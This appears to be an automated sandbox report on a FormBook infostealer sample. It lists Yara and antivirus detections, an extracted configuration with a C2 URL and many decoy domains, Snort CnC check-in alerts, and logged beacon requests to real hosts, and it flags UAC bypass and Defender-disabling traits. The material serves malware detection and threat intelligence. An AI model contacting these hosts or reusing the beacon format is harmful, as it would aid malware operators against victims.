Windows Analysis Report
SecuriteInfo.com.Variant.Tedy.130342.18814.29997

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.coraroseromance.net/aet3/"], "decoy": ["foldemforever.com", "zhouxin94.digital", "hayultrafans.com", "coinmatrfx.com", "countz-re.store", "lotcollection.com", "zuclopenthixolacetate.lundbeck", "brosgangworldwide.com", "relord.life", "smell-ease.com", "87mhxyz.com", "ccav91.com", "tinnituscure-reviews.com", "wanxunm.com", "slim7.net", "rapiturs.com", "orucqurbanov.com", "domainedulacrond.com", "rochelpraxis.com", "bilingualme.com", "0-level.com", "fuugiti.xyz", "a7gaming.com", "munichslave.com", "helpmeez.com", "czhj-led.com", "blingalingdecor.com", "gogo996icu.xyz", "hgamerpillar.com", "decentralized-asset.com", "whatisthemetafor.com", "bbthaiforex.com", "budurr.com", "mkki33.com", "sportsinfolab.com", "cornhole-nederland.com", "lilabymiko.com", "subbay.net", "ediapark.com", "teethblog.net", "internationalpageantsociety.com", "lizhisen.com", "yiqimaidan.com", "loveuco.com", "rightchoicemobiledetailing.com", "nhongever.com", "myhealthtestsite.com", "800055121.com", "filmabg.xyz", "loverightnow.biz", "optician-divine.com", "pcwx2345.com", "rdmmadu.com", "cys-cs.com", "bineghab.com", "xn--2r5b1f27r1nh.com", "weierhui.com", "everegal.xyz", "crispinandarchie.com", "bluetalkers.com", "greenfieldecostayphongnha.com", "loomsolaradmincenter.online", "vdmdyznwuej.xyz", "houseofdecoration.com"]}

Exploits

Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.130342.18814.exe PID: 7000, type: MEMORYSTR

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: explorer.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Vssf.InteractiveClient\MS.VS.Services.Client.Interactive\Microsoft.VisualStudio.Services.Client.Interactive.pdb source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp
Source:	Binary string: wntdll.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ByteCodeGenerator.exe, ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ByteCodeGenerator.pdb source: explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: ByteCodeGenerator.pdbGCTL source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 4x nop then pop edi	3_2_0040C9EF
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 4x nop then pop esi	3_2_004174C5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 4x nop then pop ebx	3_2_00406ED5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 4x nop then pop ebx	3_2_00406EAA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	12_2_0334C9EF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	12_2_03346EAA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	12_2_03346ED5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop esi	12_2_033574C5

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.coraroseromance.net
Source: C:\Windows\explorer.exe	Domain query: www.foldemforever.com
Source: C:\Windows\explorer.exe	Domain query: www.fuugiti.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.loveuco.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.18.171 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.fuugiti.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.coraroseromance.net/aet3/

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1Host: www.foldemforever.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1Host: www.fuugiti.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1Host: www.coraroseromance.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1Host: www.loveuco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 203.170.80.250 203.170.80.250
Source: Joe Sandbox View	IP Address: 203.170.80.250 203.170.80.250

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 06 Jun 2022 21:33:25 GMTContent-Type: text/htmlContent-Length: 291ETag: "629e372d-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://ma
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	String found in binary or memory: https://graph.windows.net/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	String found in binary or memory: https://login.live.com/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	String found in binary or memory: https://login.live.com/uilogout.srf
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://login.live.com/uilogout.srf/https://login.live.com/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://login.microsoftonline.com/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://login.microsoftonline.com/)AadApplicationTenantIf8cdef31-a31e-4b4a-93e4-5f571e91255a
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	String found in binary or memory: https://management.azure.com/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	String found in binary or memory: https://management.core.windows.net/
Source: explorer.exe, 0000000C.00000002.714030673.0000000005C32000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX

Source: unknown

DNS traffic detected: queries for: www.foldemforever.com

Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1Host: www.foldemforever.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1Host: www.fuugiti.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1Host: www.coraroseromance.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1Host: www.loveuco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
